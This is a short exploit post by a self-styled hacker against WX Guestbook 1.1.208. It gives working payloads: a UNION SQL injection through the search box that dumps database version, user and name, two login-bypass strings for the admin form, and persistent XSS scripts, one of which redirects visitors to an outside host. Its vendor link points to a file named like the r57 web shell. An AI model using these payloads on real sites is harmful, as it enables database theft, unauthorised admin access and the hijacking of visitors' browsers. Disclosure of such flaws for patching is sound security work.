########################################### # WX Guest Book 1.1.208 Vulns # # By xxHackerXzX hacker from nepal # # admin@xxxxxxxxxxx # ########################################### Product name: WX Guestbook 1.1.208 Product vendor: http://www.ekin0x.com/r57.txt This product suffers from multiple SQLi and persistent XSS vuln. ############## SQL Search Vuln ############### The search parameters/queries we submit to the search.php are unsanitized and hence this can be compromised to SQLinject the server. SQL query: $signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY . "%') ORDER BY `code` DESC"); The $QUERY is what we submit through search box so injecting this will sql inject the server. The following is the sample sql injection example. Sample search string: test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/* ############## SQL login bypass ############### The username and password fields are unsanitized and hence we can bypass the login systems. Username: admin'))/* Password: learn3r [or whatever] Or Username: ')) or 1=1/* Password: learn3r [or whatever] ############## Persistent XSS Vulns ############## In the name field (I suppose as I don't understand arabic), you can inject XSS... <script>alert(String.fromCharCode(97));</script> <script>location.replace("http://www.ekin0x.com";)</script>
